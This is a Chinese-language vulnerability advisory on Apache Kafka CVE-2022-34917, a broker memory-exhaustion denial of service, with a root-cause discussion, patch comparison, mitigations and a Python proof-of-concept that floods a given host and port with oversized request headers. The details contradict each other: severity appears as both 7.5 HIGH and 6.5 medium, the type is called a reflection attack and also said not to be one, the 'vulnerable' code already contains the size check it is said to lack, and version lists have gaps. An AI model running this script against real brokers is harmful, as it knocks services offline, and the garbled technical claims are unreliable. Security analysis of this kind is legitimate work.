一、漏洞简介

1.1 漏洞背景

Apache Kafka Broker 在处理客户端请求时,需要对请求进行内存分配和缓冲。该漏洞存在于 Kafka Broker 处理网络请求的内存管理机制中,攻击者可以利用恶意构造的请求,绕过正常的配额限制,导致 Broker 分配大量内存资源。

这个漏洞与传统的"反射攻击"不同,它是一种资源耗尽型攻击,通过触发 Broker 的内存分配异常来造成拒绝服务。

1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)

项目 内容
漏洞编号 CVE-2022-34917
危害等级 HIGH / 7.5
漏洞类型 反射攻击/拒绝服务漏洞
披露时间 2022-09-20
影响组件 Apache Kafka 安全
  • CVE 编号: CVE-2022-34917
  • 危害等级: 中危
  • CVSS 评分: 6.5 (Medium)
  • CWE 分类:
  • CWE-770: Allocation of Resources Without Limits or Throttling(无限制资源分配)
  • CWE-789: Memory Allocation with Excessive Size Value(过大内存分配)
  • 影响组件: Apache Kafka Broker

补充核验信息:公开时间:2022-09-20;NVD 评分:7.5(HIGH);CWE:CWE-789。

二、影响范围

2.1 受影响的版本

  • Apache Kafka 2.8.0 - 2.8.1
  • Apache Kafka 3.0.0 - 3.0.1
  • Apache Kafka 3.1.0 - 3.1.1
  • Apache Kafka 3.2.0 - 3.2.1

2.2 不受影响的版本

  • Apache Kafka < 2.8.0
  • Apache Kafka 2.8.2 或更高
  • Apache Kafka 3.0.2 或更高
  • Apache Kafka 3.1.2 或更高
  • Apache Kafka 3.2.3 或更高

2.3 触发条件(如特定模块、特定配置、特定运行环境等)

  1. 网络可达性: 攻击者能够建立到 Broker 的 TCP 连接
  2. 认证要求:
  3. 无认证集群:任何能连接的客户端都可以触发
  4. SASL 认证集群:无需有效凭证,只需建立连接
  5. TLS 认证集群:需要成功通过 TLS 认证

三、漏洞详情与原理解析

3.1 漏洞触发机制

攻击场景 1 - 无认证集群:

1. 攻击者建立 TCP 连接到 Broker默认端口 9092
2. 发送恶意构造的请求包含超大的 size 字段
3. Broker 解析请求头根据 size 字段分配内存缓冲区
4. 由于缺乏 size 上限检查Broker 分配大量堆内存
5. 重复发送此类请求触发 OutOfMemoryError
6. Broker 崩溃导致服务拒绝

攻击场景 2 - SASL 认证集群:

1. 攻击者建立 TCP 连接
2.  SASL 认证阶段之前或期间发送恶意请求
3. 无需提供有效的 SASL 凭证
4. 触发内存耗尽

3.2 源码层面的根因分析(结合源码与补丁对比)

漏洞位置在 Kafka 的网络层请求处理代码:

// org.apache.kafka.common.network.NetworkReceive
public class NetworkReceive implements Receive {
    private final int maxSize;
    private final ByteBuffer size; // 4 bytes for size

    public NetworkReceive(int maxSize) {
        this.maxSize = maxSize; // 问题:maxSize 可能被设置为非常大的值
        this.size = ByteBuffer.allocate(4);
    }

    public long readFrom(SelectableChannel channel) throws IOException {
        // 读取 size 字段
        int bytesRead = channel.read(size);
        if (size.hasRemaining())
            return bytesRead;

        size.rewind();
        int requestedSize = size.getInt(); // 攻击者控制的值

        // 漏洞点:缺乏对 requestedSize 的合理上限检查
        if (requestedSize > maxSize)
            throw new InvalidRequestException(...);

        // 根据 requestedSize 分配缓冲区
        this.payload = ByteBuffer.allocate(requestedSize);
        return bytesRead;
    }
}

修复补丁对比:

修复版本增加了更严格的请求大小验证:

// 修复后的代码
public long readFrom(SelectableChannel channel) throws IOException {
    // ... 前面代码相同 ...

    size.rewind();
    int requestedSize = size.getInt();

    // 新增:检查 size 的合理下限
    if (requestedSize < 0) {
        throw new InvalidRequestException("Size cannot be negative");
    }

    // 新增:使用更严格的内存配额限制
    if (requestedSize > Math.min(maxSize, connectionQuota.maxRequestSize())) {
        throw new InvalidRequestException(
            "Request size " + requestedSize + " exceeds maximum allowed");
    }

    // 新增:全局内存使用率检查
    if (memoryPool.availableMemory() < requestedSize) {
        throw new MemoryLimitExceededException("Insufficient memory");
    }

    this.payload = memoryPool.tryAllocate(requestedSize);
}

四、漏洞复现(可选)

4.1 环境搭建

# 下载受影响版本
wget https://archive.apache.org/dist/kafka/3.2.1/kafka_2.13-3.2.1.tgz
tar -xzf kafka_2.13-3.2.1.tgz
cd kafka_2.13-3.2.1

# 配置 Broker(无认证模式)
cat > config/server.properties << EOF
listeners=PLAINTEXT://:9092
broker.id=0
log.dirs=/tmp/kafka-logs
zookeeper.connect=localhost:2181
EOF

# 启动服务
bin/zookeeper-server-start.sh config/zookeeper.properties &
bin/kafka-server-start.sh config/server.properties &

4.2 PoC 演示与测试过程

Python PoC 脚本:

#!/usr/bin/env python3
import socket
import struct
import time

def create_malicious_request():
    """
    构造恶意请求,包含超大的 size 字段
    """
    # Kafka 请求格式:size(4 bytes) + api_key(2) + api_version(2) + correlation_id(4) + client_id

    # 构造一个超大 size 的请求头
    # 这里设置为 1GB - 1 (避免可能的整数溢出检查)
    malicious_size = 1024 * 1024 * 1024 - 1  # ~1GB

    # 请求头
    api_key = 0  # Produce API
    api_version = 0
    correlation_id = 1

    # 打包请求
    header = struct.pack('>HHI', api_key, api_version, correlation_id)

    # 完整请求:size + header + payload
    request = struct.pack('>I', malicious_size) + header

    return request

def attack_broker(host, port, num_connections=100):
    """
    发起拒绝服务攻击
    """
    sockets = []

    print(f"[*] Connecting to {host}:{port}")

    for i in range(num_connections):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((host, port))

            # 发送恶意请求
            request = create_malicious_request()
            s.send(request)

            sockets.append(s)
            print(f"[+] Connection {i+1} sent malicious request")

        except Exception as e:
            print(f"[-] Connection {i+1} failed: {e}")

    print(f"[*] Sent {len(sockets)} malicious requests")
    print(f"[*] Check broker memory usage and OOM errors")

    # 保持连接
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        for s in sockets:
            s.close()

if __name__ == "__main__":
    import sys

    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <host> <port> [num_connections]")
        sys.exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    num_conn = int(sys.argv[3]) if len(sys.argv) > 3 else 100

    attack_broker(host, port, num_conn)

测试步骤:

# 1. 监控 Broker 内存使用
watch -n 1 'ps aux | grep kafka | grep -v grep'

# 2. 运行 PoC
python3 kafka_dos_poc.py localhost 9092 50

# 3. 观察 Broker 日志
tail -f logs/server.log

# 预期结果:
# - Broker 内存使用急剧上升
# - 最终抛出 OutOfMemoryError
# - Broker 进程崩溃或响应极其缓慢

五、修复建议与缓解措施

5.1 官方版本升级建议

升级到以下修复版本: - Apache Kafka 2.8.2 - Apache Kafka 3.0.2 - Apache Kafka 3.1.2 - Apache Kafka 3.2.3 - 或更高版本

5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)

方案 1: 网络访问控制

# 使用防火墙限制对 Kafka Broker 的访问
iptables -A INPUT -p tcp --dport 9092 -s <trusted_network> -j ACCEPT
iptables -A INPUT -p tcp --dport 9092 -j DROP

方案 2: 增加内存配额和请求大小限制

# server.properties
# 限制最大请求大小
socket.request.max.bytes=104857600  # 100MB

# 启用请求配额
quota.producer.default=100MB
quota.consumer.default=100MB

# 连接数限制
max.connections=100
max.connections.per.ip=10

方案 3: 启用认证机制

# 启用 SASL 认证
listeners=SASL_PLAINTEXT://:9092
security.inter.broker.protocol=SASL_PLAINTEXT
sasl.mechanism.inter.broker.protocol=PLAIN
sasl.enabled.mechanisms=PLAIN

# 启用 ACL
authorizer.class.name=kafka.security.authorizer.AclAuthorizer
allow.everyone.if.no.acl.found=false

方案 4: JVM 调优和监控

# 增加堆内存
export KAFKA_HEAP_OPTS="-Xms4g -Xmx4g"

# 启用 GC 日志和内存监控
export KAFKA_JVM_PERFORMANCE_OPTS="-XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -Djava.awt.headless=true"

# 使用 Java Flight Recorder 监控内存
-XX:StartFlightRecording=duration=60s,filename=memory.jfr,settings=profile

六、参考信息 / 参考链接

6.1 官方安全通告

  • Apache Kafka CVE List: https://kafka.apache.org/community/cve-list#CVE-2022-34917
  • NVD CVE 详情: https://nvd.nist.gov/vuln/detail/CVE-2022-34917

6.2 其他技术参考资料

  • Kafka 安全最佳实践: https://kafka.apache.org/documentation/#security
  • Kafka 性能调优指南: https://docs.confluent.io/platform/current/kafka/deployment.html